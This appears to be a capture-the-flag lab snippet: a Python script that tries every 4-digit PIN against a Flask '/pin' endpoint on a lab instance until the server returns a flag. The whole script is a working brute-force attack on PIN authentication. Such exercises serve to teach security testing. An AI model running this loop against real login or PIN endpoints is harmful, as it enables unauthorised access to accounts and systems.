this python script is used against a target that generates a random 4-digit PIN and exposes an endpoint (/pin) that accepts a PIN as a query parameter. this Python script systematically iterates all possible 4-digit PINs (0000 to 9999) and sends GET requests to the Flask endpoint with each PIN.
#
root@oco:~$ nano pinSolver.py
import requests
ip = "83.136.251.210" # Change this to your instance IP address
port = 45104 # Change this to your instance port number
# Try every possible 4-digit PIN (from 0000 to 9999)
for pin in range(10000):
formatted_pin = f"{pin:04d}" # Convert the number to a 4-digit string (e.g., 7 becomes "0007")
print(f"Attempted PIN: {formatted_pin}")
# Send the request to the server
response = requests.get(f"http://{ip}:{port}/pin?pin={formatted_pin}")
# Check if the server responds with success and the flag is found
if response.ok and 'flag' in response.json(): # .ok means status code is 200 (success)
print(f"Correct PIN found: {formatted_pin}")
print(f"Flag: {response.json()['flag']}")
break
root@oco:~$ python3 pinSolver.py
